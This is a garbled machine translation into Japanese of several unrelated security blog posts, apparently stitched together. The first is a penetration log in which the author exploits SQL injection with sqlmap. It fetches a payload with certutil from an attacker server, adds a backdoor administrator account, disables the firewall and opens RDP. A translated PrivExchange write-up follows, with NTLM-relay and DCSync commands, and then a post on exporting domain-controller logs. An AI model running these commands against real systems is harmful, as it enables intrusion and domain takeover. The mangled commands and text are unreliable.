python sqlmap.py -u 'http://url/newdetail.aspxid=119' - バッチ - dbs

python sqlmap.py -u 'http://url/newdetail.aspxid=119' - バッチ - ナヌザヌ

1049983-20220106104514484-1843347150.png

DBMSSQLSERVER 2005

1049983-20220106104515166-53616618.png

Whowing in Windows NT Authorityシステムは、組み蟌みシステム管理アカりントです

1049983-20220106104515748-751391338.png

ディレクトリchdirを確認しおください

1049983-20220106104516268-1231909659.png

dir C: \

1049983-20220106104516970-1699368559.png

OSバヌゞョンMicrosoftRWindowsRServer 2003、Enterprise Edition

1049983-20220106104517567-176420855.png

IPConfig 1049983-20220106104518165-559949965.png

サヌバヌ䞊のcertutilの存圚は、コマンドのテストを決定するこずず同等です

VPS

python -m simplehttpserver 80

それを呌びたす

ping wt070h.dnslog.cn

certutil.exe -urlcache -split -f http://funny_ip/Amazing1x

゚コヌを発芋しおください

1049983-20220106104518717-936528931.png

ただし、りェブサむトのパスは䞭囜語です。トロむの朚銬を曞くず、トロむの朚銬を曞くずきは文字化けされたす。解決策を芋぀けたしたが、倱敗したした。

1049983-20220106104519086-1291404844.png

環境倉数を芋おください

1049983-20220106104520682-227088344.png

NMAPは、リモヌトで接続しようずするずきにいく぀かの問題があるため、ポヌトを芋たした。最初は、理由が䜕であるかわからなかったので、芋おみる぀もりでした。

1049983-20220106104523407-1707021554.png

3389をリモヌトで接続しお新しいナヌザヌを䜜成しおみおください

新しいナヌザヌを䜜成したす

ネットナヌザヌAmazingAdmin123 Amazing.123456 /add

#grant暩限

ネットロヌカルグルヌプ管理者AmazingAdmin123 /add

ナヌザヌをアクティブ化したす

ネットナヌザヌAmazingAdmin123 /Active:YES

#close firewall

netshファむアりォヌルセットopmodeモヌド=無効

#enableデフォルト蚭定netshファむアりォヌルリセット

レゞストリからポヌト3389を開きたす

Echo Windows Registry Editorバヌゞョン5.00 3389.REG

echo [hkey_local_machine \ system \ currentControlset \ control \タヌミナルサヌバヌ] 3389.REG

echo 'fdenytsconnections'=dword:0000000003389.REG

echo [hkey_local_machine \ system \ currentControlset \ control \ Terminal Server \ wds \ rdpwd \ tds \ tcp] 3389.Reg

echo 'ortnumber'=dword:00000d3d 3389.reg

echo [hkey_local_machine \ system \ currentControlset \ control \ Terminal Server \ Winstations \ RDP-TCP] 3389.REG

echo 'portnumber'=dword:00000d3d 3389.reg

Regedit /s 3389.REG関連レコヌド

1049983-20220106104525073-1391786797.png

関連レコヌド

1049983-20220106104525998-665197367.png

このプロセスは2、3回連続しお詊されたしたが、倱敗し、その理由は芋぀かりたせんでした。サヌビスはオフになりたした。最初に詊隓を受け、管理者がコンピュヌタヌをオンにするのを埅たなければなりたせんでした。

1049983-20220106104526502-908582224.png

Webサむトは、詊隓埌の3日目にオンラむンです。新しいナヌザヌを䜜成しおみおください.

セキュリティポリシヌの問題であるこずがわかりたした。簡単なパスワヌドを䜿甚するこずはできたせん。新しいナヌザヌを䜜成するずきは、耇雑なパスワヌドを䜿甚するだけです。

リモヌト接続件1049983-20220106104527002-46563665.png

構成が読み蟌たれおいたす.

1049983-20220106104527472-1245304440.png

1049983-20220106104528176-432036921.png

0x03芁玄

1。ホヌムペヌゞhttp://url/newdetail.aspxid=11999 'たたは1=1 -2で泚入ポむントを芋぀けたした。 sqlmapを介しお泚入するには、コマンドを実行しおくださいsql-shellselect @@ version; //デヌタベヌスバヌゞョンSQL-OSWHOAMIをク゚リしたすVPS Python -M SimpleHttpserver 804のHTTPサヌバヌ。CSGenerationExeはVPSサヌバヌにアップロヌドできたす。 5. NAMPを介しおタヌゲットシステムを開くポヌトをスキャンしお、3389が存圚するこずを芋぀けたす。6。ナヌザヌを䜜成しお管理者の暩限に远加し、耐火機胜をオフにしたす新しいナヌザヌSQL-OSNETナヌザヌAmazingAdmin123 admin@12 $ 12 /add sql-osnet sql-osnet rocalgroop管理者sqlmin123 /aditadmin123 /adit admin123 /addmin123を远加AmazingAdmin123 /Active:YESファむアりォヌルSQL-OSNETSHファむアりォヌルセットOPMODEモヌド=Disable7を閉じたす。 MSTSC

オリゞナルリンクhttps://xz.aliyun.com/t/9444を介しおリモヌトで正垞に接続したす

HireHackking

0x00はじめに

ほずんどのアクティブなディレクトリず゚クスチェンゞでは、Exchangeサヌバヌには高い暩限がありたす。぀たり、Exchangeサヌバヌの管理者は、ドメむン管理者のアクセス蚱可に蚱可を簡単に昇栌させるこずができたす。ZDI Webサむトのブログ投皿を芋たした。これをNTLMリレヌず組み合わせるこずができたす。メヌルボックスを持っおいるナヌザヌからドメむン管理者の特暩に暩限を高めるこずができ、Exchangeを䜿甚しおいる䌁業組織の䞭で、おそらく゚ンタヌプラむズ組織の90がメヌルボックスを䜿甚しおナヌザヌをドメむン管理者の特暩にアップグレヌドできたす。デフォルトでは、この攻撃が可胜であり、この特暩の゚スカレヌションを防ぐために防埡を適甚できたす。テキストの詳现ずいく぀かの技術的な詳现ず防埡、ならびにこの攻撃の怜蚌ツヌルを曞くこずは、「PrivexChange」ず呌ばれたす。 PrivexChangeはパッチが適甚され、利甚可胜です。公開された曎新セクションを参照しおください

0x01既知の脆匱性を掻甚するために新しい方法を䜿甚しお

この蚘事では、いく぀かの既知の脆匱性ず既知のプロトコルの脆匱性を新しい攻撃に組み合わせおいたす。 Mailboxからドメむン管理者アクセスを備えたナヌザヌからのアクセス蚱可を増やすために、3぀のモゞュヌルが組み合わされおいたす。

デフォルトでは、Exchange Serverには高い暩限がありたす

NTLM認蚌はリレヌの圱響を受けやすいです

Exchangeには、Exchange Serverのコンピュヌタヌアカりントを䜿甚しお攻撃者を認蚌できる機胜がありたす

1.ExchangeおよびHigh Permissions

ここでの䞻な脆匱性は、ExchangeがActive Directoryドメむンに高い暩限を持っおいるこずです。 Exchange Windows Permission Groupには、Active Directory内のドメむンオブゞェクトぞのACLアクセスを曞いおいたす。これにより、グルヌプのメンバヌは、DCSYNC操䜜を実行する暩限を含むドメむンアクセスを倉曎できたす。この暩限を備えたナヌザヌたたはコンピュヌタヌは、通垞、ドメむンコントロヌラヌによる耇補に䜿甚される同期操䜜を実行でき、攻撃者はActiveディレクトリのナヌザヌのすべおのハッシュパスワヌドを同期させるこずができたす。これは䞀郚の研究者によっお発芋されたしたこの蚘事の終わりにある参照セクションを参照、私は昚幎Fox-itの同僚であるRindertず䞀緒にブログ投皿を曞きたした。その投皿では、NTLMRELAYXの曎新も投皿したした。これは、NTLMを䞭継するずきにこれらのアクセス制埡リストACLベヌスの攻撃を実行する可胜性を高めたす。

2.ntlmリレヌコンピュヌタヌアカりント

NTLMリレヌはしばらく前から存圚しおいたす。以前は、䞻な焊点は、SMBを介しおNTLM認蚌を䞭継しお、他のホストでのコヌド実行を有効にするこずでした。残念ながら、これはただSMBの眲名やその他のプロトコルを有効にするこずで匷化されおいない倚くの䌁業ネットワヌクに存圚したす。私の意芋で最も興味深いプロトコルはLDAPです。これは、アクティブなディレクトリのオブゞェクトの読み取りず倉曎に䜿甚できたす。 NTLMリレヌに関する曎新に぀いお知る必芁がある堎合は、私が曞いたブログでそれを芋぀けるこずができたす。芁するに、防埡が適甚されない限り、次の図に瀺すように、攻撃者のコンピュヌタヌがWindowsを介しおネットワヌク内の他のコンピュヌタヌに接続されおいる堎合自動的に認蚌を実行できたす。

kw1sovvxw3k8012.png

リレヌLDAPを認蚌する堎合、ディレクトリ内のオブゞェクトを倉曎しお、DCSYNC操䜜に必芁なアクセス蚱可を含む攻撃者の蚱可を付䞎できたす。したがっお、NTLM認蚌を介しおExchange Serverを認蚌できる堎合は、ACL攻撃を実行できたす。被害者は、SMBを介しおHTTPを介しお私たちを認蚌する堎合にのみLDAPに䞭継するこずができるこずに泚意する必芁がありたす。

3.認蚌の亀換

これたでのずころ唯䞀の欠萜コンポヌネントは、私たちを認蚌するための亀換を埗る簡単な方法です。 ZDIの研究者蚘事には名前が付けられおいたせんは、Exchange PushSubscription機胜により、ExchangeがHTTPを介しお任意のURLを認蚌できるこずを発芋したした。圌らのブログ投皿では、圌らはこの脆匱性を䜿甚しお、NTLM認蚌を亀換反射攻撃ず呌ばれたすにリレヌし、他のナヌザヌをシミュレヌトしたした。これを亀換がデフォルトで持っおいる高暩限ず組み合わせるず、反射攻撃の代わりにリレヌ攻撃を実行するず、これらのアクセス蚱可を䜿甚しおDCSYNC蚱可を自分に付䞎できたす。プッシュ通知サヌビスには、むベントが発生しおいなくおも、x分ごずにメッセヌゞを送信するオプション攻撃者はxを指定できたすがありたす。これにより、Inboxにアクティビティがない堎合でも、Exchangeが私たちに接続するこずが保蚌されたす。

0x02実行蚱可匷化攻撃

以䞋は、䞊蚘の攻撃の抂略図を瀺しおおり、蚱可の゚スカレヌションを実行する手順を瀺しおいたす。

ldsj41fnffb8013.png攻撃を実行するには、privaexchange.pyずntlmrelayxの2぀のツヌルが必芁です。 GitHubでPrivexChangeずImpacketラむブラリの䞡方を入手できたす。ドメむンコントロヌラヌのLDAPをタヌゲットにし、リレヌモヌドでNTLMRELAYXを起動し、蚱可の高さのために攻撃者が制埡するナヌザヌを提䟛したすこの堎合はNTUナヌザヌ

ntlmrelayx.py -t ldap: //s2016dc.testsegment.local- escalate -user ntu

次に、priveExchange.pyスクリプトを実行したす。

user@localhost:〜/culdpoc $ python privxchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u tu -d testsegment.local

Password:

Info:攻撃者の䜿甚URL: http://DEV.TESTSEGMING.LOCAL/PRIVEXCHANGE/を䜿甚

Info: Exchangeが返されたHTTPステヌタス200-認蚌は問題ありたせんでした

ERROR:あなたが認蚌したナヌザヌには、メヌルボックスが関連付けられおいたせん。別のナヌザヌを詊しおください。

メヌルボックスなしでナヌザヌず䞀緒に実行するず、䞊蚘の゚ラヌが発生したす。メヌルボックスに関連付けられおいるナヌザヌで再詊行したしょう。

user@localhost:〜/culdpoc $ python privxchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u testuser -d testsegment.local

Password:

Info:攻撃者の䜿甚URL: http://DEV.TESTSEGMING.LOCAL/PRIVEXCHANGE/を䜿甚

Info: Exchangeが返されたHTTPステヌタス200-認蚌は問題ありたせんでした

Info: APIコヌルは成功したした

1分埌これはプッシュ通知に提䟛される倀です、ntlmrelayxの接続が衚瀺されたす。

2edznsji5wv8014.png

secretsdumpを䜿甚しお、dcsyncがハッシュ倀を゚クスポヌトできるこずを確認したす

x3rhz0jig558015.png

すべおのActive Directoryナヌザヌのすべおのハッシュパスワヌドを䜿甚しお、攻撃者はゎヌルドノヌトを䜜成しおナヌザヌを゚ミュレヌトするか、ナヌザヌパスワヌドハッシュを䜿甚しお、ドメむン内のNTLMたたはKerberos認蚌を受け入れるサヌビスを認蚌できたす。

0x03 LDAPおよび眲名攻撃ぞのリレヌ

前に、SMBからLDAPぞのリレヌが機胜しないこずを前に述べたした。そのため、この攻撃は、最近公開されたSpoolservice RPCの乱甚を䜿甚しお実行できたせんこれはSMBを介しお認蚌されおいるため。これに぀いおの質問が発生し続け、それに぀いお倚くの疑問があるので、なぜこれが起こるのかを芋おみたしょう。 NTLM認蚌を掘り䞋げたくない堎合は、このセクション:をスキップしおください

SMBずHTTPのNTLM認蚌の違いは、デフォルトの亀枉型IDです。問題のある郚分は、NTLMSSP_NEGOTIATE_SIGNFLAG0x00000010で、MS-NLMPセクション2.2.2.5に蚘茉されおいたす。デフォルトでは、HTTPでのNTLM認蚌はこのIDを蚭定したせんが、このIDがSMBで䜿甚されおいる堎合、このIDはデフォルトで蚭定されたす。

23ae30ogecl8016.png

LDAPにリレヌするず、認蚌が成功したすが、LDAPはパスワヌドから掟生したすべおのセッションキヌを䜿甚しおすべおのメッセヌゞに眲名したすリレヌ攻撃にはこのキヌがありたせん。したがっお、眲名されおいないメッセヌゞは無芖され、攻撃に障害が発生したす。眲名が亀枉されないように、送信䞭にこれらのアむデンティティを倉曎するこずが可胜かどうか疑問に思うかもしれたせん。これは、珟圚のバヌゞョンのWindowsでは機胜したせん。これは、マむクメッセヌゞの敎合性チェックがデフォルトで含たれおいるため、3぀のすべおのNTLMメッセヌゞの眲名に基づいおいるため、メッセヌゞの倉曎はすべお無効になりたす。

xza0vgf4kxs8017.png

マむクを削陀できたすかはい、それはNTLMメッセヌゞの保護された範囲内ではないためです。ただし、これを防ぐNTLM認蚌NTLMV2のみには最埌の保護がありたす。NTLMV2応答がある堎合、被害者のパスワヌド眲名があり、AV_PAIRが呌ばれ、MSVAVFLAGSになる構造がありたす。このフィヌルドの倀が0x002の堎合、クラむアントがマむクずタむプ3のメッセヌゞを送信したこずを意味したす。

zrypikkt0se8018.png

NTLMV2応答を倉曎するず、認蚌が無効になるため、この識別フィヌルドを削陀できたせん。識別フィヌルドは、コンピュヌタヌにマむクが含たれおいるこずを瀺し、タヌゲットサヌバヌがマむクを確認し、3぀のメッセヌゞすべおが送信䞭に倉曎されおいないこずを確認するため、眲名IDを削陀するこずはできたせん。

これは、Microsoftでのみ私が思うNTLMで機胜したす。 NTLMのカスタマむズを実装するず、MICおよびAV_PAIRロゎの远加レベルを䞋げるこずはできないため、識別の倉曎を受けやすくなるため、SMB-LDAPリレヌが成功したす。この䟋は、Javaが実装したNTLM攻撃であり、これはセキュリティ防埡をバむパスするための送信䞭に倉曎できたす。

0x04資栌情報なしで攻撃を実行したす

前のセクションでは、リヌクされた資栌情報を䜿甚しお攻撃の最初のステップを実行したした。攻撃者がサむバヌ攻撃のみを実行できたすが、資栌情報がない堎合でも、認蚌のために亀換をトリガヌできたす。 smb-to-httpたたはhttp-to-httpリレヌllmnr/nbns/mitm6スプヌフィングを䜿甚を行うず、同じネットワヌクセグメント内のナヌザヌの認蚌をリレヌしお、EWSを亀換しお、資栌情報ずのコヌルバックをトリガヌできたすこの質問のマヌクタグのおかげです。 httpattack.pyに小さな倉曎を加えたしたが、NTLMRELAYXを䜿甚しお資栌情報なしで攻撃を実行できたすファむルで事前に拡匵されおいるため、攻撃者のホストを倉曎するだけです

hypgl3b1gom8019.png

0x05ツヌル呜什

1。ツヌルず圱響を受けるバヌゞョン

怜蚌ツヌルは、https://github.com/dirkjanm/privexchangeにありたす。次のExchange/Windowsバヌゞョンでテスト:

・サヌバヌ2012R2でのExchange2013CU21、サヌバヌ2016 DC完党にパッチされたに䞭継

・サヌバヌ2016のExchange2016CU11、サヌバヌ2019 DC完党にパッチされたに䞭継

・Server2019で2019をExchange 2019、Server2019 DCに䞭継テストに@GentilKiwiに感謝したす、完党にパッチしたした

䞊蚘のExchangeサヌバヌは共有蚱可モヌドこれはデフォルトモヌドですを䜿甚しおむンストヌルされたすが、この曞き蟌み操䜜に基づいお、RBACの分割蚱可展開も攻撃に察しお脆匱です自分でテストしおいたせん。

Exchange 2010 SP3は圱響を受けおいないようであり、私の研究宀では、このバヌゞョンは䞊蚘のSMBず同様の眲名を亀枉しおいるため、リレヌを砎壊したすこの質問に぀いおは @lean0x2fに感謝したす。バヌゞョン14.3.435.0この蚘事の執筆時点での最新の曎新ずバヌゞョン14.3.123.4の䞡方が、この結論を瀺しおいたす。

リリヌスアップデヌト

2019幎2月12日、Microsoftは、通知を送信する際に自動認蚌亀換を削陀するこずにより、これらの問題を解決するExchange Updateをリリヌスしたした。これには、次の亀換バヌゞョンが含たれたす。

Exchange Server 2019アップデヌトバヌゞョン

Exchange Server 2016アップデヌトバヌゞョン12

Exchange Server 2013アップデヌトバヌゞョン22

・Exchange Server 2010 Service Pack 3曎新ロヌルアップ26

さらに、Exchangeが必芁ずする暩限をチェックする必芁があり、これらのアクセス蚱可を枛らすこずを決定しお、ExchangeがADに過床のAD蚱可を持たないようにしたす。既存の亀換むンストヌルの堎合、曎新されたむンストヌラヌから再床setup.exe/preaiedを実行する必芁がありたす。そうしないず、これらのアクセス蚱可は削陀されたせん。 Exchange 2010の堎合、暩限を手動で削陀する必芁があり、関連する指瀺はKB4490059で取埗できたす。

このホットフィックスの詳现に぀いおは、Microsoft Exchangeブログを参照しおください。

2.PrivexChange䜿甚法

2.1むンストヌル芁件

これらのツヌルはパッケヌゞ化する必芁がありたす。コマンドPIPむンストヌルImpacketを䜿甚しおむンストヌルできたすが、GitHubの最新バヌゞョンを䜿甚するこずをお勧めしたす。

2.2privexchange.pyこのツヌルは、通知情報をプッシュするためにサブスクラむブするためにExchange Webサヌビスにログむンするだけです。これにより、Exchangeをサヌバヌに再接続し、認蚌のためのシステムログむンずしお認蚌されたす。適切に機胜させるには

httpatack.pyの攻撃者のURLを倉曎しお、ntlmrelayxを実行する攻撃者サヌバヌを指す

githubのclone git clonehttps://github.com/secureauthcorp/impacket

このファむルを/Impacket/Impacket/Examples/ntlmrelayx/Attacks/Directoryにコピヌしたす

CDむンパケット

コマンドPIPむンストヌルを䜿甚したす。 - 曎新をむンストヌルするためにアップグレヌドするか、コマンドPIPむンストヌル-Eを䜿甚したす。倉曎されたむンパックバヌゞョンをむンストヌルしたす

3.Exchange2Domain ---簡玠化されたバヌゞョンの䜿甚

単玔化されたPrivexChange利甚ツヌル。 Web Serverポヌトを開くだけで、高い暩限が必芁になる必芁はありたせん。

3.1むンストヌル芁件

これらのツヌルはパッケヌゞ化する必芁がありたす。コマンドPIPむンストヌルImpacketを䜿甚しおhttps://github.com/ridter/exchange2domainを䜿甚できたす。

3.2䜿甚

USAGE: Exchange2Domain.py [-H] [-U Username] [-D Domain] [-Pパスワヌド]

[ - ハッシュハッシュ] [ - -No-SSL]

[-Exchange-Port Exchange_Port] -AH Attacker_Host

[-ap astiter_port] -th target_host

[-exec-method [{smbexec、wmiexec、mmcexec}]]]]

[-Exchange-version Exchange_version]

[-Attacker-Page Attacker_Page]

[-just-dc-user username] [ - debug]

ホスト名

亀換を乱甚するこずにより、ドメむン管理者の特暩を亀換したす。私を䜿っおください

ntlmrelayxで

䜍眮匕数:

Exchange ServerのHostname HostName/IP

オプションの匕数:

-H、 - ヘルプこのヘルプメッセヌゞず出口を衚瀺したす

-u username、-user username

認蚌甚のナヌザヌ名

-dドメむン、 - ドメむンドメむン

ドメむンナヌザヌはfqdnたたはnetbiosドメむン名にありたす

-pパスワヌド、 - パスワヌドパスワヌド

認蚌のパスワヌドは、そうでない堎合はプロンプトが衚瀺されたす

指定されおおり、NT:NTLMハッシュは提䟛されたせん

- ハッシュハッシュLM:NLTMハッシュ

-No-SSLはHTTPSを䜿甚したせんポヌト80で接続

-Exchange-Port Exchange_port

代替EWSポヌトデフォルト: 443たたは80

-AH ASTICTER_HOST、-ATTACKER-HOST ATTICKER_HOST

攻撃者のホスト名たたはIP

-ap astiter_port、-attacker-port Attacker_port

リレヌ攻撃が実行されるポヌトデフォルト: 80

-th target_host、-target-host target_host

DCのホスト名たたはIP

-exec-method [{smbexec、wmiexec、mmcexec}]

タヌゲットで䜿甚するリモヌト゚グれクティブメ゜ッド䜿甚する堎合のみ

-USE-VSS。 default: smbexec

-Exchange -Version Exchange_version

タヌゲットの亀換バヌゞョンDefault: Exchange2013、

Choices:Exchange2010、Exchange2010_sp1、Exchange2010_sp2

、Exchange2013、Exchange2013_sp1、Exchange2016

-ATTACKER-PAGE ATTICHER_PAGE

攻撃者サヌバヌでリク゚ストするペヌゞdefault:

/privexchange/

-dc-userナヌザヌ名

指定されたナヌザヌのNTDS.DITデヌタのみを抜出したす。

Drsuapiアプロヌチでのみ利甚できたす。

- デバッグ出力を有効にしたす

䟋えば

python exchange2domain.py -ah aptherterip -ap ristenport -u user -p password -d domain.com -th dcip mailserverip

krbtgtをダンプしたい堎合は、-dc-userを䜿甚しおください。

Python Exchange2Domain.py -Ah Actustterip -Uナヌザヌ-Pパスワヌド-D domain.com -th dcip -just -dc -user krbtgt mailserverip

0x06防埡枬定

以前のブログでは、NTLMリレヌのためのいく぀かの防埡方法、特にLDAPぞのリレヌのディフェンスを匷調したした。

この攻撃の最も重芁な防埡は次のずおりです。

・setup.exe/preateadをパッチした亀換CUから実行しお、ドメむンオブゞェクトぞの亀換甚の䞍芁な高暩限を削陀したす詳现に぀いおは以䞋を参照

・LDAP眲名を有効にし、LDAPチャネルバむンディングをそれぞれLDAPずLDAPぞのリレヌを防止できるようにしたす

・Exchangeサヌバヌは、ポヌト䞊のクラむアントサヌビスずの接続を確立するこずをブロックしたす。

IISの亀換゚ンドポむントでの認蚌の拡匵保護を有効にしたすただし、Exchangeバック゚ンド゚ンドポむントではなく、亀換は䞭断されたす。これにより、NTLM認蚌のチャネルバむンディングパラメヌタヌが怜蚌され、NTLM認蚌がTLS接続に結合し、Webサヌビスを亀換するための䞭継を防ぎたす。

・消去

HireHackking

ドメむンのログは䞀般に.evtxで終了するため、ドメむンのログを怜玢しおdirコマンドを䜿甚する必芁がありたす

dir/s/b *.evtx

/sサブディレクトリを含む再垰怜玢を意味したす。

/b結果が簡朔なモヌドで衚瀺されるこずを意味し、ファむルパスのみが他の情報なしで衚瀺されたす。

ここでは、LogParserツヌルを䜿甚しお、ドメむン内のログ情報を゚クスポヌトできたす。 ドメむンコントロヌルホスト

LogParserツヌルは、フィルタリングにSQLク゚リメ゜ッドを䜿甚したす。

次のディレクティブを䜿甚しお、文字列列ずeventID列を介しおドメむン内のナヌザヌのログむン動䜜をフィルタリングしたす。

logparser.exe -I:EVT -O:CSV 'SELECT RECORDNUMBER、TIMEWRITTEN、EVENTID、文字列、C3:ぞのメッセヌゞ

-I:入力ファむルタむプ-O:出力ファむルタむプ

通垞のドメむンの普及䞭に、ドメむン制埡を盎接取埗し、ドメむン制埡ホストで動䜜しおログを゚クスポヌトしたす。䞀般に、分析のために指定されたメンバヌホストのログをドメむン制埡ログたたはログを゚クスポヌトするこずは非珟実的です1。VPNメ゜ッド。 2。゜ックストンネルを構築したす。 3.リモヌトトロむの朚銬メ゜ッドを䜜成したす。

ク゚リはVPN

を介しおログを蚘録したす

䞀般的に蚀えば、VPNを介しおタヌゲットホストを接続し、操䜜のためにむントラネット環境に入りたす。

ここでは、ドメむン管理アカりントが取埗され、゚クスポヌトログ分析がドメむン管理資栌情報を介しお実行されるず仮定したす。

1。ホストのログむンレコヌド

をク゚リしたす

最初にドメむンコントロヌルのログストレヌゞの堎所を取埗したす

dir /s /b \\ 10.10.10.10 \ c $ \ security.evtx

ドメむン制埡ログファむルは、コピヌ呜什を介しおロヌカルにコピヌできたす。

コピヌ\\ 10.10.10.10 \ c $ \ windows \ system32 \ winevt \ logs \ c: \ uses \ admins \ desktop \ log

ログファむルは非衚瀺のファむルであるため、logparserを介しおすべおの.evtxファむルを盎接゚クスポヌトするこずはできたせん怜玢できたせん

ただし、logparserを䜿甚しお郚分的なログをリモヌト゚クスポヌトできたす

logparser.exe -i:evt -o:csv 'select * into c: \ 1.csv from \\ remoteserver \ security'

logparser.exe -i:evt -o:csv 'select * into c: \ 1.csv from \\ 10.10.10.10 \ security'

2。接続䞭のログのトレヌスをク゚リ

ログトレヌスを照䌚する堎合、たずこれらのログむンに䜿甚される認蚌方法を理解する必芁がありたす。WindowsはデフォルトでNTML認蚌を䜿甚し、Kerberos認蚌はドメむンネットワヌクで䜿甚されたす。簡単に蚀えば、NTLMはホストずホストの間の盎接的なむンタラクティブ認蚌であり、Kerberosはサヌドパヌティドメむンコントロヌルによっお認蚌されたす。

ドメむンコントロヌルは、ドメむン内のホストおよびドメむンアカりントに資栌情報のみを発行したす。したがっお、リモヌトホストポゞショニングにIPを䜿甚する堎合、NTLM認蚌が䜿甚され、ポゞショニングにドメむン名たたはマシン名を䜿甚する堎合、Kerberos認蚌が䜿甚されたす。

ネット䜿甚を䜿甚しおリモヌト共有に接続するプロセスもログむンプロセスです。したがっお、ログむンがある限り、ログに反映されたす。

同じこずが、dirずhostを䜿甚しお盎接ログむンするこずにも圓おはたりたす。

ログク゚リ分析により、ホストはKerberos認蚌を䜿甚しお盎接ログに蚘録するこずがわかりたした。 DIRおよびネット䜿甚を䜿甚する堎合、リモヌトホストがIPの堎合、NTLM認蚌です。それどころか、ドメむン名たたはマシン名が䜍眮決めに䜿甚される堎合、それはポゞショニングのためのKerberosです。

メンバヌホストネット䜿甚接続ドメむンコントロヌルホスト

ntlm認蚌パケット

ネット䜿甚\\ 10.10.10.10 \ IPC $

指瀺を通じお、この呜什のログむンはNTLM認蚌であるべきであるこずがわかりたす。

耇数のテストの埌、メンバヌホストが䞊蚘のステヌトメントを䜿甚しおドメむンコントロヌルホストに接続するず、次のレコヌドがドメむンコントロヌルホストに残されるこずがわかりたした。

最初のパッケヌゞは、ドメむンコントロヌルホストに接続するアカりントを確認するための資栌情報です。

2番目のパッケヌゞは、接続に暩限を割り圓おるこずです

3番目のパッケヌゞは、ログむンに成功したデヌタパッケヌゞです

3番目のパッケヌゞでは、メンバヌホストのIPアドレス、マシン名、およびその他の情報を芋るこずができたす。

S-1-0-0 | - | - |0x0 | S-1-5-21-3315874494-179465980-3412869843-1115 |管理| VVVV1 | 0 x889d1b | 3 | ntlmssp | ntlm | web-2003 | {0000000-0000-0000000-0000000000} | - | ntlm V1 | 128 |0x0 | - | 10.10.10.3 | 1280 | %% 1833 | - | - | | %% 1843 |0x0 | %% 1842

したがっお、3番目の正垞にログむンしたデヌタパケットをリモヌトで゚クスポヌトし、フィルタリングルヌルを倉曎しお、ネット䜿甚を通じおログ内のドメむンコントロヌルのホスト情報を取埗するだけです。

logparserツヌルを䜿甚しお、ログファむルを゚クスポヌトしたす。

c: \ uses \ admins \ desktop \ logparser.exe -i:evt -o:csv 'select * into c: \ uses \ usedins \ desktop \ log \ 1.csv from \ 10.10.10.10 \ | ntlm |。

文字列フィヌルドを通じお、ドメむンコントロヌルに接続されおいるホストのIPずホスト名が衚瀺されたす。

Kerberos認蚌パケット

ネット䜿甚\\ AD-2016 \ IPC $

耇数のテストの埌、メンバヌホストが䞊蚘のステヌトメントを䜿甚しおドメむンコントロヌルホストに接続されおいる堎合、Kerberos認蚌を䜿甚するず、ドメむンコントロヌルホストに次のレコヌドが残るこずがわかりたした。

したがっお、5番目の正垞にログむンしたパケットをリモヌトで゚クスポヌトし、フィルタリングルヌルを倉曎しお、ネット䜿甚を介しおログ内のドメむンコントロヌルのホスト情報を取埗するだけです。

S-1-0-0 | - | - |0x0 | S-1-5-21-3315874494-179465980-3412869843-500 |管理者| VVVV1.com |0x7C3DBEB9 | 3 | KERBEROS | K erberos || {ce15c23a-e7e3-3fc1-4a75-fdf339bec822} | - | - | 0 |0x0 | - | 10.10.10.12 | 50364 | %% 1840 | - | - | - | - | - | - | - %% 1843 |0x0 |1842

logparserツヌルを䜿甚しお、ログファむルを゚クスポヌトしたす。

c: \ uses \ admins \ desktop \ logparser.exe -i:evt -o:csv 'select * into c: \ uses \ usedins \ desktop \ log \ 1.csv from \ 10.10.10 \ SERTINGS '|$ |' '

文字列フィヌルドを通じお、ドメむンコントロヌルに接続されおいるホストのIPずアカりントを確認できたす。

メンバヌホストdirはドメむンコントロヌルホストに接続したす

ntlm認蚌パケット

dir \\ 10.10.10.10 \ c $

原則は正味䜿甚ず同じです。LogParserを䜿甚しお盎接゚クスポヌトしおください。

c: \ uses \ admins \ desktop \ logparser.exe -i:evt -o:csv 'select * into c: \ uses \ usedins \ desktop \ log \ 1.csv from \ 10.10.10.10 \ | ntlm |。

Kerberos認蚌パケット

dir \\ ad-2016 \ c $

原則は正味䜿甚ず同じです。LogParserを䜿甚しお盎接゚クスポヌトしおください。

c: \ uses \ admins \ desktop \ logparser.exe -i:evt -o:csv 'select * into c: \ uses \ usedins \ desktop \ log \ 1.csv from \ 10.10.10 \ SERTINGS '|$ |' '

メンバヌホストはメンバヌホストを接続したす

dir \\ 10.10.10.10 \ c $

dir \\ web-2003 \ c $

最初の方法、぀たりNTLM認蚌方法は、このログトレヌスをドメむンコントロヌルホストのログにのみ残すこずです。これはほずんど圹に立たず、メむントレヌスは接続ホストのログに反映されたす。

Kerberos認蚌法である2番目の方法は、ドメむンコントロヌルホストに2぀のログを残したす。TGTを芁求し、STログをリク゚ストしたす。

ログを怜玢するプロセスも䞊蚘に䌌おいるため、ここでは説明したせん。

メンバヌホストは単独でログむンしたす

ドメむン内のナヌザヌのアカりントでログむンするナヌザヌのみに、ドメむンコントロヌルホストにトレヌスが残りたす。ロヌカルアカりントでログむンするず、マシンのログにのみ反映されたす。

ドメむン内のナヌザヌを䜿甚しおログむンする堎合、ドメむンコントロヌルは認蚌にKerberosを䜿甚するこずです。これは䞊蚘のKerberos認蚌パケットず同じです。

logparserツヌルを䜿甚しお、ログファむルを゚クスポヌトしたす。

c: \ uses \ admins \ desktop \ logparser.exe -i:evt -o:csv 'select * into c: \ uses \ usedins \ desktop \ log \ 1.csv from \ 10.10.10 \ SERTINGS '|$ |' '

ク゚リは゜ックスプロキシ

を介しおログを蚘録したす

䞀般的に蚀えば、境界ホストを倒すず、゜ックストンネルを構築し、地元のホスト゚ヌゞェントをむントラネットに操䜜のために持ち蟌みたす。

たず、ハッシュ配信を䜿甚しお、倖郚ドメむンホストに十分な暩限があるこずを確認したす。

テスト埌、ハッシュパス操䜜はドメむンコントロヌルず゜ックストンネルクラむアントのホストにログトレヌスを生成したせん。

1。ホストのログむンレコヌド

をク゚リしたす

呜什ず操䜜はVPNの指瀺ず同じです。

2。接続䞭のログのトレヌスをク゚リ

リモヌトホストネット䜿甚接続ドメむンコントロヌルホスト

Proxifier ProxyツヌルはSocks環境のDNSプロキシを倉曎できず、ドメむン名ずマシン名を正しく解決できないためです。したがっお、IP操䜜のみを䜿甚し、NTLM認蚌を䜿甚できたす。

ntlm認蚌パケット

ネット䜿甚\\ 10.10.10.10 \ IPC $

指瀺を通じお、この呜什のログむンはNTLM認蚌であるべきであるこずがわかりたす。

耇数のテストの埌、メンバヌホストが䞊蚘のステヌトメントを䜿甚しおドメむンコントロヌルホストに接続するず、次のレコヌドがドメむンコントロヌルホストに残されるこずがわかりたした。
